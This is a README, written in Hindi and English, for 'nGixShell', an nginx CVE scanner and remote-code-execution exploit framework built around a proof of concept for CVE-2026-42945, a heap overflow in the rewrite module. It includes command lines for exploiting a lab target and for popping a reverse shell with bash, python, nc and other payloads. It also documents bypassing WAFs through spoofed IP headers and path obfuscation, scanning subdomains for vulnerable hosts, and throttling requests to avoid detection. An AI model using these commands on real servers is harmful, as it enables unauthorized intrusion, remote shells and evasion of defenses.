
nginx CVE स्कैनर + RCE शोषण ढाँचा (CVE-2026-42945 + 16 अन्य)
nGixShell एक nginx CVE स्कैनर और RCE एक्सप्लॉइट फ्रेमवर्क है। यह CVE-2026-42945 (F5/NVD के अनुसार CVSS 3.1 8.1 HIGH) के लिए एक proof-of-concept शिप करता है — जो ngx_http_rewrite_module में एक heap buffer overflow है — और एक स्कैनर जो 64 nginx CVEs को कवर करता है, जिसमें स्वचालित HTTP प्रोब, फिंगरप्रिंटिंग, WAF डिटेक्शन/बायपास, वेब सुरक्षा ऑडिटिंग, और रिपोर्ट जनरेशन शामिल हैं।
शून्य बाहरी निर्भरताएँ। शुद्ध Python 3 stdlib।
एक्सप्लॉइट पूर्वापेक्षाएँ (पहले पढ़ें)।
--cmd/--shellकेवल तब काम करते हैं जब ये सभी सत्य हों: लक्ष्य x86_64 हो, कमजोरrewrite+setकॉन्फ़िग मौजूद हो, ASLR अक्षम हो, और heap/libc पते उस विशिष्ट बिल्ड के लिए कैलिब्रेट किए गए हों (calibrate.py→--build-file)। देखें Exploit Requirements। स्कैनर स्वयं की ऐसी कोई पूर्वापेक्षा नहीं है।
# Spin up the vulnerable lab (builds nginx from source, ASLR disabled)
docker compose -f env/docker-compose.yml up -d --build
# Auto mode — fingerprint + CVE scan + web audit (works on any arch)
python3 ngixshell.py 127.0.0.1:19321
# RCE — calibrate, restart the worker for a clean heap, then exploit
W=$(pgrep -f 'nginx: worker' | head -1)
sudo python3 calibrate.py 127.0.0.1 19321 "$W" --spray-path /spray \
--spray-mode full --json -o profile.json
docker compose -f env/docker-compose.yml restart nginx-vuln
python3 ngixshell.py 127.0.0.1:19321 --cmd 'id > /tmp/rce.txt' \
--build-file profile.json
docker compose -f env/docker-compose.yml exec nginx-vuln cat /tmp/rce.txt
# Drop a reverse shell (IP auto-detected)
python3 ngixshell.py 127.0.0.1:19321 --shell --shell-type bash --upgrade-shell --build-file profile.json
# Detect and bypass WAF, then scan
python3 ngixshell.py 127.0.0.1:19321 --waf-bypass
# Subdomain scan
python3 ngixshell.py --subdomain-scan example.com --scan-port 443
# Multiple targets from a file (one report per target)
python3 ngixshell.py --target-file hosts.txt --json --html-report results.html
किसी फ्लैग की आवश्यकता नहीं — टूल को किसी लक्ष्य पर इंगित करने से सब कुछ स्वचालित रूप से चलता है।
TLS स्वतः पहचाना जाता है। server_tokens off के साथ भी nginx का फिंगरप्रिंट लिया जाता है।
system()stdout को कैप्चर नहीं करता:--cmd 'id'चलता है लेकिन कुछ भी वापस प्रिंट नहीं करता। एक ऐसी कमांड का उपयोग करें जिसका कोई देखने योग्य साइड इफेक्ट हो और उसे--verify-url http://target/pwnedसे पुष्टि करें (HTTP 200 = पुष्ट)।
python3 ngixshell.py [TARGET] [OPTIONS]
TARGET formats:
127.0.0.1
192.168.1.10:8080
http://192.168.1.10:8080
https://target.local
| Flag | Description |
|---|---|
| (none) | Auto — fingerprint + CVE scan + web audit |
--cmd 'CMD' | Execute command via CVE-2026-42945 RCE |
--cmd-file FILE | Execute commands from file (joined with ;) |
--shell | Pop a reverse shell |
--shell-type TYPE | Payload: bash python perl php nc powershell (default: python) |
--upgrade-shell | Auto-send PTY upgrade after shell connects |
--verify-url URL | After a detected crash, fetch URL to confirm the command ran (200 = verified) |
--subdomain-scan DOMAIN | Find vulnerable nginx on subdomains |
--cve CVE-ID | Test one specific CVE |
--list-cves | Print all 64 CVEs with CVSS and probe info |
--list-candidates | Print heap address candidates |
--dry-run | Fingerprint + scan only, no exploit |
--target-file FILE | Scan multiple hosts from a file |
| Flag | Description |
|---|---|
--build-file FILE | Recommended. JSON calibration profile from calibrate.py --json -o FILE |
--offsets SPEC | Comma-separated hex heap offsets from calibrate.py (e.g. 0x5a427,0x60e67) |
--heap-base HEX / --libc-base HEX / --system-addr HEX | Manual address overrides |
--build KEY | Built-in profile (only the DepthFirst lab reference is shipped) |
--rewrite-path PATH | Vulnerable rewrite location (default /api) |
--spray-path PATH | proxy_pass-backed location used for the POST-body spray (default /upload; the bundled lab uses /spray) |
--spray-mode partial|full | partial: short body + large Content-Length (bundled lab); full: complete body + X-Delay (DepthFirst lab) |
--pad-a N / --pad-plus N | Trigger-path padding before the + run (defaults 349 / 969, from the vendor PoC) |
--continue-on-crash | Keep trying the remaining heap candidates after an unverified crash |
--tries N / --spray N / --body-len N | Trigger attempts per candidate / spray connections / spray body size |
| Flag | Description |
|---|---|
--waf-detect | Detect WAF before scanning |
--waf-bypass | Enable all bypass techniques (also runs detection) |
--waf-ip IP | Spoof this IP in bypass headers (default: random RFC1918) |
Bypass techniques (all active when --waf-bypass is set):
| Technique | Detail |
|---|---|
| IP spoofing | X-Forwarded-For, X-Real-IP, X-Originating-IP, True-Client-IP, X-Remote-IP, X-Client-IP |
| UA rotation | 11 real browser/bot User-Agents, randomised per request |
| Path obfuscation | double-slash, /./ padding, percent-encoding, case variation |
| Header case shuffle | randomises header name casing to break WAF pattern matching |
Detected WAFs: Cloudflare, AWS WAF, Akamai, Imperva/Incapsula, ModSecurity, F5 BIG-IP ASM, Sucuri, Barracuda, NAXSI, Fastly, Wordfence
स्कैन मोड में स्वचालित रूप से चलता है। सभी मॉड्यूल को व्यक्तिगत रूप से छोड़ा जा सकता है।
| Flag | Description |
|---|---|
--skip-headers | Skip HTTP security header audit |
--skip-paths | Skip path/file discovery |
--skip-vhosts | Skip virtual host enumeration |
--skip-tls | Skip TLS protocol audit |
--path-wordlist FILE | Extra paths to probe (one per line) |
/nginx_status if exposed| Flag | Description |
|---|---|
--port PORT | Override port |
--tls | Force TLS (auto-detected by default) |
--proxy URL | Proxy: http://, https://, socks5:// |
| Flag | Description |
|---|---|
--user-agent UA | Custom User-Agent |
--auth USER:PASS | HTTP Basic auth |
--cookie VALUE | Cookie header |
--header NAME:VALUE | Extra header (repeatable) |
| Flag | Description |
|---|---|
--rate-limit RPS | Max requests per second |
--jitter MS | Random delay 0–MS ms between requests |
--retry N | Retry inconclusive probes (default: 1) |
--timeout-multiplier X | Scale all timeouts (default: 1.0) |
| Flag | Description |
|---|---|
--output FILE | Write log to FILE |
--json | Print JSON summary at end (multi-target: {"targets": [...]}) |
--html-report [FILE] | Generate HTML report (one file per target in multi-target mode) |
--verbose | Debug output |